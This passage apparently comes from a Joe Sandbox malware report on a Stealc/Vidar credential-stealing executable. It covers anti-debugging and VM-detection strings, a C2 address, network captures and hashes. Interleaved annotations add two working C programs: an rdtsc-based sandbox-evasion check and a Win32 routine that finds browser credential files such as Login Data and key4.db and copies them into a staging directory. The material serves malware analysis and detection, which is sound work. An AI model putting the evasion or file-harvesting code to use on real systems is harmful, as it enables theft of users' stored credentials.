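    return median_delta(deltas, n) > threshold;
}

int main(void)
{
#if defined(__x86_64__) || defined(__i386__)
    enum { N = 101 };
    uint64_t deltas[N];
    for (size_t i = 0; i < N; i++)
        deltas[i] = timed_cpuid();
    printf("median rdtsc delta around cpuid: %llu cycles -> %s\n",
           (unsigned long long)median_delta(deltas, N),
           rdtsc_check_trips(deltas, N, 1000) ? "looks virtualized" : "looks native");
#else
    puts("rdtsc is x86-only; nothing sampled on this architecture");
#endif
    return 0;
}
```

The "RDTSC instruction interceptor" label on each line above is the sandbox-side counter to this check: the analysis engine traps consecutive rdtsc reads and can hand back plausible small deltas, which is why the decision logic is listed as observed rather than as having succeeded.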
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 114DAC8 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12EB679 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 12F84C0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Evaded block: after key decision (graph_0-39161)
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E740F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6E530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E747C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6F7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E61710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6DB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E74B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E73B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6BE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6EE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E6DF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
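The call chains above share one shape: FindFirstFileA, two StrCmpCA calls (the "." and ".." skip), an optional PathMatchSpecA filter, then CopyFileA and DeleteFileA on each hit, FindNextFileA, FindClose. That is the enumerate-filter-stage loop a stealer uses to pull browser databases and similar files into a staging copy before reading them. The following is an added illustration of that loop, not code recovered from file.exe. The '*'/'?' matcher reproduces the part of PathMatchSpecA the chains rely on, so the filter logic runs on any platform; the directory walk itself needs the Win32 API and is only compiled on Windows. The pattern list and the staging directory in the demo are assumptions.

```c
/* Added illustration of the FindFirstFileA/PathMatchSpecA/CopyFileA loop;
 * not code from file.exe. Patterns and paths below are assumptions. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Case-insensitive glob with '*' (any run, including empty) and '?' (one
 * char), using iterative backtracking so deep patterns cannot recurse. */
int glob_match(const char *pat, const char *name)
{
    const char *star = NULL, *resume = NULL;
    while (*name) {
        if (*pat == '*') {
            star = pat++;            /* remember the star, try matching nothing */
            resume = name;
        } else if (*pat == '?' ||
                   toupper((unsigned char)*pat) == toupper((unsigned char)*name)) {
            pat++; name++;
        } else if (star) {
            pat = star + 1;          /* let the last star swallow one more char */
            name = ++resume;
        } else {
            return 0;
        }
    }
    while (*pat == '*') pat++;       /* trailing stars match the empty tail */
    return *pat == '\0';
}

/* The two StrCmpCA calls before every CopyFileA in the report are this. */
int is_dot_entry(const char *name)
{
    return strcmp(name, ".") == 0 || strcmp(name, "..") == 0;
}

/* Semicolon-separated spec list, the form PathMatchSpecA accepts. */
int matches_any(const char *specs, const char *name)
{
    char buf[256];
    strncpy(buf, specs, sizeof buf - 1);
    buf[sizeof buf - 1] = '\0';
    for (char *tok = strtok(buf, ";"); tok; tok = strtok(NULL, ";"))
        if (glob_match(tok, name))
            return 1;
    return 0;
}

#ifdef _WIN32
#include <windows.h>
/* One directory level: copy every non-directory entry matching specs into
 * staging; returns the number of files copied. The report's DeleteFileA
 * after CopyFileA is the later removal of such staging copies. */
int harvest_dir(const char *dir, const char *specs, const char *staging)
{
    char pattern[MAX_PATH], src[MAX_PATH], dst[MAX_PATH];
    WIN32_FIND_DATAA fd;
    int copied = 0;
    snprintf(pattern, sizeof pattern, "%s\\*", dir);
    HANDLE h = FindFirstFileA(pattern, &fd);
    if (h == INVALID_HANDLE_VALUE)
        return 0;
    do {
        if (is_dot_entry(fd.cFileName) || (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
            continue;
        if (!matches_any(specs, fd.cFileName))
            continue;
        snprintf(src, sizeof src, "%s\\%s", dir, fd.cFileName);
        snprintf(dst, sizeof dst, "%s\\%s", staging, fd.cFileName);
        if (CopyFileA(src, dst, FALSE))
            copied++;
    } while (FindNextFileA(h, &fd));
    FindClose(h);
    return copied;
}
#endif

int main(void)
{
    /* Constructed directory listing and an assumed spec list for the demo. */
    const char *specs = "*.db;*.sqlite;Login Data";
    const char *listing[] = { ".", "..", "key4.db", "cookies.sqlite", "Login Data", "readme.txt" };
    for (size_t i = 0; i < sizeof listing / sizeof *listing; i++)
        printf("%-16s %s\n", listing[i],
               is_dot_entry(listing[i]) ? "skip (dot entry)" :
               matches_any(specs, listing[i]) ? "copy" : "ignore");
#ifdef _WIN32
    /* Assumed paths; on Windows this performs the real walk. */
    printf("copied %d file(s)\n", harvest_dir("C:\\Users\\user\\AppData\\Local\\Temp\\demo-src",
                                             specs, "C:\\Users\\user\\AppData\\Local\\Temp\\demo-stage"));
#endif
    return 0;
}
```

From the defender's side the useful signal is the pairing: a process that walks profile directories with a wildcard filter and immediately CopyFileA's the hits into its own temp directory is staging, not browsing, and that sequence is cheap to alert on.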
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E61160 GetSystemInfo,ExitProcess
                Source: file.exe, 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2114601767.0000000001792000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWb$3%
                Source: file.exe, 00000000.00000002.2114601767.0000000001792000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2114601767.0000000001762000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37977
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37974
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37996
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37988
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37861
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-38028
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E64610 VirtualProtect ?,00000004,00000100,000000000_2_00E64610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E79BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79AA0 mov eax, dword ptr fs:[00000030h]0_2_00E79AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E77690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00E77690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1716, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E79790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E79790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E798E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00E798E0
                Source: file.exe, file.exe, 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EA75A8 cpuid 0_2_00EA75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E77D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E76BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00E76BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E779E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E779E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E77BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E77BC0

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.file.exe.e60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2073513483.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1716, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0.2.file.exe.e60000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000003.2073513483.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1716, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix

                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                Credentials | Domains | Default Accounts | 12 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 334 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                Source | Detection | Scanner | Label | Link
                file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
                file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label | Link
                https://docs.rs/getrandom#nodejs-es-module-support | 0% | URL Reputation | safe |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.php | true | | unknown
                http://185.215.113.206/ | true | | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.206/6c4adf523b719729.phpC | file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.phps | file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php/ | file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206 | file.exe, 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.206/: | file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                http://185.215.113.206/6c4adf523b719729.php; | file.exe, 00000000.00000002.2114601767.0000000001780000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
                https://docs.rs/getrandom#nodejs-es-module-support | file.exe, file.exe, 00000000.00000003.2073513483.000000000555B000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp | false | URL Reputation: safe | unknown
                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                185.215.113.206 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1543870
                                Start date and time:2024-10-28 15:27:05 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 25s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 128
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • VT rate limit hit for: file.exe
                                No simulations
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                185.215.113.206 | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206/6c4adf523b719729.php
                | file.exe | malicious | Stealc | 185.215.113.206/6c4adf523b719729.php
                                No context
                Match | Associated Sample Name / URL | Detection | Threat Name | Context
                WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                | file.exe | malicious | Stealc | 185.215.113.206
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                | file.exe | malicious | Stealc | 185.215.113.206
                | Bjl3geiFEK.exe | malicious | Phorpiex | 185.215.113.66
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                | file.exe | malicious | Stealc | 185.215.113.206
                | file.exe | malicious | Stealc, Vidar | 185.215.113.206
                | file.exe | malicious | LummaC | 185.215.113.16
                | file.exe | malicious | Stealc | 185.215.113.206
                                No context
                                No context
                                No created / dropped files found
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.9611732743201955
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'151'424 bytes
                                MD5:15716110ba606bed84e305d1d8525eba
                                SHA1:a51087861dc45958cd52acec71d7255c36398aa1
                                SHA256:14e0eab38beddaf7adc2997b84bd7777d2ccb898de7f9ce5afe1c0e6008c87f1
                                SHA512:cc1a71a264084664396fa8208b07deca6e2b20e28db7544d11a9218413e803bb4ec3c2c6c402df4cf59ae49d6aaeed2051e58bf1373a591e9dcdb7a376466a51
                                SSDEEP:49152:/wJ0lh3lfZWR2hn4acruXLOENIBUVlz5bzRGgeesOrPzR:4C9zyauuXLsUVlzNqWrPz
                                TLSH:94A533199B5DCFBEEA0FA6FA109BFEFA7DB55704BAC48A1D5D0506B05840B60B08C44F
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...
                                Icon Hash:00928e8e8686b000
                                Entrypoint:0xb33000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b
                                Instruction
                                jmp 00007F9EA525C47Ah
                                Programming Language:
                                • [C++] VS2010 build 30319
                                • [ASM] VS2010 build 30319
                                • [ C ] VS2010 build 30319
                                • [ C ] VS2008 SP1 build 30729
                                • [IMP] VS2008 SP1 build 30729
                                • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2e9050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                (unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 0d617b12950e329e78f8b4976918a9f8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                (unnamed) | 0x2ea000 | 0x2a5000 | 0x200 | a8a0227c39b42a678cbd989378b97d91 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                kkezmvxm | 0x58f000 | 0x1a3000 | 0x1a2400 | 39e762fe5297fa325e20704d4570795b | False | 0.9947383536312014 | PGP Secret Sub-key - | 7.953994841848818 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                fehabrus | 0x732000 | 0x1000 | 0x400 | 079d31e015e30c1bb5ab9a3eb227320f | False | 0.7197265625 | data | 5.779483051242652 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                .taggant | 0x733000 | 0x3000 | 0x2200 | 361a99fcd195dbe15428a6fb8e1278d3 | False | 0.06353400735294118 | DOS executable (COM) | 0.726021614226017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                kernel32.dll | lstrcpy
                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                2024-10-28T15:28:01.711498+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 28, 2024 15:28:00.532157898 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 28, 2024 15:28:00.537832975 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 28, 2024 15:28:00.537940025 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 28, 2024 15:28:00.538064957 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 28, 2024 15:28:00.543446064 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 28, 2024 15:28:01.428689003 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 28, 2024 15:28:01.428816080 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 28, 2024 15:28:01.432284117 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 28, 2024 15:28:01.437629938 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 28, 2024 15:28:01.711447954 CET | 80 | 49704 | 185.215.113.206 | 192.168.2.5
Oct 28, 2024 15:28:01.711498022 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
Oct 28, 2024 15:28:05.615484953 CET | 49704 | 80 | 192.168.2.5 | 185.215.113.206
                                • 185.215.113.206
